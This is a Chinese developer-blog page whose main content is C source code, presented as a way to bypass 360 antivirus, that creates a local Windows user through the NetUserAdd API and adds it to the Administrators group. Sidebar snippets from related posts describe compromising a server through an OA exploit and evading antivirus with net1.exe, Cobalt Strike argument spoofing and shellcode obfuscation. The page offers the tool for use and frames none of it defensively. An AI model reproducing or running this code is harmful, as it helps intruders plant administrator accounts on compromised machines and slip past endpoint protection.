绕过360 添加用户

最新推荐文章于 2024-07-08 15:13:46 发布
最新推荐文章于 2024-07-08 15:13:46 发布
阅读量4.4k 收藏
点赞数 1
分类专栏: Network Security 文章标签: 360 null user token api ui 
//Code by Pnig0s1992  
   //Date:2012,3,17  
   #include <stdio.h>  
   #include <Windows.h>  
   #include <lm.h>  
    
   #pragma comment(lib,"Netapi32.lib")  
    
   int AddUser(LPWSTR lpUsername,LPWSTR lpPassword,LPWSTR lpServerName);  
   int SetGroup(LPWSTR lpUsername,LPWSTR lpServerName,LPWSTR lpGroupName);  
   BOOL ImprovePriv(LPWSTR name);  
    
   int main(INT argc,char * argv[])  
   {  
       BOOL bResult = ImprovePriv(SE_MACHINE_ACCOUNT_NAME);  
       if(argc < 3)  
       {  
           printf("\nCode by Pnig0s1992");  
           printf("\nUsage:");  
           printf("\n\t%s UserName Password",argv[0]);  
           printf("\n\tRemark:Default add to Group:Administrators.");  
           return -1;  
       }  
       if(bResult)  
       {  
           printf("Successfully promote priv!");  
       }else 
       {  
           printf("Failed promote priv.");  
           return -1;  
       }  
       int Namesize=MultiByteToWideChar(CP_ACP,0,argv[1],-1,NULL,0);  
       wchar_t *wUserName =new wchar_t[Namesize+1];  
       if(!MultiByteToWideChar(CP_ACP,0,argv[1],-1,wUserName,Namesize))  
       {   
           return false;  
       }  
       int Passsize=MultiByteToWideChar(CP_ACP,0,argv[2],-1,NULL,0);  
       wchar_t *wPassword =new wchar_t[Passsize+1];  
       if(!MultiByteToWideChar(CP_ACP,0,argv[2],-1,wPassword,Passsize))  
       {   
           return false;  
       }  
       LPTSTR lpName = wUserName;  
       LPTSTR lpPassword = wPassword;  
       LPWSTR lpSevName = NULL;  
       LPWSTR lpGroupName = L"Administrators";  
       AddUser(lpName,lpPassword,lpSevName);  
       SetGroup(lpName,lpSevName,lpGroupName);  
       return 0;  
   }  
    
   BOOL ImprovePriv(LPWSTR name)  
   {  
       HANDLE hToken;  
       if(!OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES,&hToken))  
       {  
           printf("\nGet process token failed.(%d)",GetLastError());  
           return FALSE;  
       }  
       TOKEN_PRIVILEGES tkp;  
       tkp.PrivilegeCount = 1;  
       if(!LookupPrivilegeValue(NULL,name,&tkp.Privileges[0].Luid))  
       {   
           printf("\nLookup process priv failed.(%d)",GetLastError());  
           return FALSE;  
       }  
       tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;  
       if(!AdjustTokenPrivileges(hToken,FALSE,&tkp,0,NULL,NULL))  
       {   
           printf("\nAjust process priv failed.(%d)",GetLastError());  
           return FALSE;  
       }  
       CloseHandle(hToken);  
       return TRUE;  
   }  
    
   int AddUser(LPWSTR lpUsername,LPWSTR lpPassword,LPWSTR lpServerName)  
   {  
       USER_INFO_1 ui;  
       DWORD dwLevel = 1;  
       DWORD dwError = 0;  
       NET_API_STATUS nStatus;  
       ui.usri1_name = lpUsername;  
       ui.usri1_password = lpPassword;  
       ui.usri1_priv = USER_PRIV_USER;  
       ui.usri1_home_dir = NULL;  
       ui.usri1_comment = NULL;  
       ui.usri1_flags  = UF_SCRIPT;  
       ui.usri1_script_path  = NULL;  
       nStatus = NetUserAdd(lpServerName,dwLevel,(LPBYTE)&ui,&dwError);  
       if(nStatus == NERR_Success)  
       {  
           printf("\nAdd user:%S successfully!",lpUsername);  
       }else 
       {  
           printf("\nAdd user failed:%d.",nStatus);  
       }  
       return 0;  
   }  
    
   int SetGroup(LPWSTR lpUsername,LPWSTR lpServerName,LPWSTR lpGroupName)  
   {  
       NET_API_STATUS nStatus;  
       LOCALGROUP_MEMBERS_INFO_3  lgui;  
       lgui.lgrmi3_domainandname = lpUsername;  
       nStatus = NetLocalGroupAddMembers(lpServerName,lpGroupName,3,(LPBYTE)&lgui,1);  
    
       if(nStatus == NERR_Success)  
       {  
           printf("\nSuccessfully set USER:%S to GROUP:%S!",lpUsername,lpGroupName);  
       }else if(nStatus == NERR_GroupNotFound)  
       {  
           printf("\nCan't find such a group:%S.",lpGroupName);  
       }else 
       {  
           printf("\nSet GROUP:%S failed.",lpGroupName);  
       }  
       return 0;  
   }

Mideveloper
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 5
    评论
专栏目录
绕过360创建用户登陆内网3389实战记录
白泽Sec安全实验室
11-21 2750
目标:某集团 通过信息收集:得到通达OA界面 利用通达exp,获得目标主机system权限(多快好省) 查看当前开放端口,发现已经开启3389 那么我们直接创建账户,发现net命令不能不能使用,猜测应该是有杀软防护 Tasklist查看进程,确实存在360 Net命令不能使用,可以使用windwosapi接口方式绕过,但是手上没有现成的编译好的绕过文件(虽然网上有源码)。想到可以尝试使用net1.exe绕过360检测,成功执行命令建账户 连接3389,发现报错? Nmap识别端口指纹,发现并没有
绕过360添加用户.mp4
12-05
绕过360添加用户,大家都知道在提权的时候会可能会遇到360.0000000.。。。。。。。。。。。
绕过360给目标机器添加账户
weixin_65550121的博客
12-07 1231
Beacon 对象文件 (BOF) 是一个已编译的 C 程序,按照约定编写,允许其在 Beacon 进程内执行并使用内部 Beacon API。在BOF中我们是可以通过GetProcAddress,LoadLibraryA,GetModuleHandle 来调用我们想要的windows API。它们在 Beacon 进程内部运行,并且可以使用进程注入块中的可延展的 c2 配置文件来控制内存。其实go函数就是BOF的入口,当你在CS上执行inline-execute命令的时候,就会调用go函数。
绕过杀毒软件添加账号
Shanfenglan's blog
01-14 6680
文章目录1.使用CS绕过拦截2.使用vbs文件3.参考文章 1.使用CS 使用CS直接用shell添加会被拦截。 绕过拦截 使用argue命令来伪装命令的参数,然后使用run来执行,逻辑是: 以挂起状态启动匹配的进程(使用伪参数) 使用实参更新进程内存 恢复进程 效果如下,且没有被拦截: argue net saldjfoiwjeofijoisfklasjdlfjasdfiowjefoijwoefjoaisjefojsaefoiwejfowef run net user asdf 123 /add
绕过杀软添加用户
weixin_63124284的博客
11-22 1810
绕过杀软添加账户
绕过360简单技巧(免杀)
06-04
需要注意的是,尽管这种方法可能有助于绕过一些基于静态特征的检测,但360杀毒和其他高级安全软件通常会结合动态行为分析,因此仅靠修改表面特征并不一定能完全避免检测。此外,免杀技术的运用需要遵守法律法规,...
劫持QQ2013过360卫士9.1添加启动项(方法+工具)
04-03
标题中的“劫持QQ2013过360卫士9.1添加启动项”涉及到的是计算机安全领域的一个话题,主要讨论如何绕过360安全卫士的防护,将QQ2013设置为开机启动。在这个过程中,可能需要理解以下几个知识点: 1. **启动项管理**...
360误杀
09-24
在这个场景中,"小鹏专用易语言过360误杀工具"很可能是小鹏使用易语言编写的一个工具,旨在帮助其他开发者或用户解决360安全卫士误删或阻止他们程序运行的问题。 过360误杀的实现方式通常包括但不限于以下几种: 1...
最新过360免杀
12-17
"最新过360免杀"的描述可能意味着一种新的免杀策略或者工具,能够有效绕过360安全卫士的云引擎检测。这通常需要深入理解360云引擎的检测机制,包括其特征库更新、启发式分析和行为监控等方面。黑客可能会通过对恶意...
Windows编程-提升进程权限,以管理权限启动另一个程序
NINE_world的博客
10-04 1270
#include <iostream> #include <windows.h> #include <tchar.h> using namespace std; //提高自己的权限 /* * 这个函数,将进程权限提升成具有调试权限的进程,这个权限应该是进程所能具有的最大权限 * 前提启动这个进程的账户必须是一个管理员,否则没法提升 */ //当fEnable = TRUE 的时候,授予当前进程调试权限 //当fEnable = FALSE 的时候,收回调试权限 //
易语言源码易语言模拟按键绕过360源码.rar
03-31
易语言源码易语言模拟按键绕过360源码.rar
简单绕过不能创建用户,幸运提权八核服务器
weixin_33751566的博客
12-04 186
我们手里现在有一个小webshell,访问速度挺快,网站用途也算不小,我估计服务器配置也不很低吧。仅仅是估计。那么开工。先用菜刀执行一下cmd,看看是否可以执行。呐,这里呢是不能直接执行的。我们传个cmd上去再试试, 这里呢,不懂的新手可以先看看我的另一篇帖子,提权某理工大学分站学院上传完成 设置路径 setp C:\RECYCLER\cmd.exe再试命令whoam...
android root 绕过权限,绕过360ROOT身份校验高权限执行恶意代码
weixin_35599815的博客
05-31 525
本文主要分享一种本地socket通信过程中存在的身份校验缺陷而产生的绕过方法,以此来实现高权限执行恶意代码。在上个月中发现360ROOT工具在ROOT的过程中并不会直接去下载ROOT模块来提权,而是先看下设备上有没有运行某一个特定的后台服务端程序,这个后台程序就是首次用360ROOT后而安装的,存放在system目录下以360s命名的文件。如果检查到进程存在的话,就直接连接后台服务端,发送运行指定...
Shellcode免杀,绕过360安全卫士、火绒安全、腾讯管家
热门推荐
qq_1873822的博客
08-22 1万+
前言 分享一个傻瓜式直接套用大佬的框架进行shellcode免杀,自己还是萌新还需要学习很多东西,大佬们不喜勿喷 杀毒原理 360、腾讯电脑管家、火绒剑、金山毒霸、瑞星等等,这几个杀毒软件领头羊,现在的杀毒软件都无法脱离三个部分,扫描器、病毒库、虚拟机。然而一个杀毒软件做的是否好用,最主要的还是扫描器的速度、准确率以及病毒库是否庞大。 1.基于特征码的静态扫描技术 这种技术很容易被人想到,所以第一代的杀毒软件出现了,他们的杀毒思想就是,我只要匹配到特征字符串就可以判断出来这个文件是一个病毒。但这种方法在当今
记一次绕过安全狗与360艰难提权
XunanSec的博客
06-07 1853
端午短暂休息三天,复工之后朋友又丢给我一个,在打台球途中了解了一下这个奇怪的,说是无法执行命令,经过测试发现只能执行命令,确实奇怪,草草打了几局台球就回去拿起电脑开日菜刀上面写着当前用户为,但是执行任何命令都没有回显,要不是这个可以上传下载浏览文件,我都怀疑这个是假的了难道是禁用了高危函数吗?查看发现也没禁用呀至于这种没有任何回显的,一时间有点不知所措,那么就先翻一下文件吧(这是在没有思路情况下的一种思路) 顺便也可以了解目标机器的环境,是否存在杀软,是否宝塔面板搭建的等等......每一个环境都有每一种思
绕过360安全卫士的部分代码
冷风
09-22 7308
利用快捷方式,由用户启动程序,进行绕过360
攻防演练 | 记一次内网渗透过程
2301_80115097的博客
04-12 790
1、现在的内网渗透总要面对杀软,时时刻刻都要有自己一套绕过杀软或免杀的能力,过不去杀软都是浮云2、内网主要就是信息收集,需要收集好本地密码、浏览器记录、数据库密码、可达网段、多网卡机器、重点目标、是否有域等等3、横向移动,本次主要用了密码喷洒,信息收集后发现内网机器并不多,就没再继续横向4、重点资产要特别关注,像一下堡垒机、天擎、这样的终端控制服务,拿下后直接游戏结束。
免杀手法入门中
最新发布
m0_64481831的博客
07-08 567
Hook是杀软的主要方法,它提供了一种方式去截获系统级别或者应用级别的函数调用、消息、事件等。使用Hook,开发者可以在不修改源程序的情况下,改变或者扩展操作系统、应用程序、驱动程序的功能。主要分为两种形式,分别是修改函数代码和修改函数地址。
python自启动 绕过360_记录一次绕过杀软的过程
06-10
首先,需要注意的是,绕过杀软是一种不道德的行为,同时也是违法的。因此,我们不鼓励或支持这种行为。 其次,关于Python自启动,一般有两种方法: 1. 将Python脚本添加到系统的启动项中。这样,每次开机启动时,系统会自动运行这个脚本。具体步骤如下: - 打开“运行”窗口,输入“shell:startup”,打开启动文件夹。 - 右键点击文件夹中的空白处,选择“新建”->“快捷方式”。 - 在“快捷方式”的目标栏中输入“python.exe 脚本路径”,如“C:\Python27\python.exe D:\test.py”。 - 点击“下一步”,输入一个名称,如“test”,点击“完成”即可。 2. 使用Windows任务计划程序。这样,可以设置脚本在指定的时间自动运行。具体步骤如下: - 打开“控制面板”->“管理工具”->“任务计划程序”。 - 在任务计划程序中,右键点击“任务计划程序库”,选择“创建任务”。 - 在“常规”选项卡中,输入一个名称和描述,选择“不管用户是否登录都要运行”,勾选“使用最高权限运行”。 - 在“触发器”选项卡中,选择“新建”,设置计划的触发条件,如每天、每周等。 - 在“操作”选项卡中,选择“新建”,设置操作为“启动程序”,输入“python.exe 脚本路径”。 - 点击“确定”保存任务。 对于绕过杀软的过程,一般有以下几种方法: 1. 使用FUD(Fully Undetectable)技术,将病毒代码加密或混淆,使其难以被杀软检测到。 2. 使用虚拟机或沙箱环境,在其中运行病毒代码,以避免被杀软检测。 3. 修改病毒代码,使其不再具有病毒行为,从而不被杀软检测到。 4. 手动编写病毒代码,使用未被杀软识别的技术和方法。 需要注意的是,这些方法都存在风险和不道德性质,因此不应该轻易尝试。同时,杀软的主要目的是保护用户安全,因此绕过杀软的行为也可能会对用户造成风险和危害。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值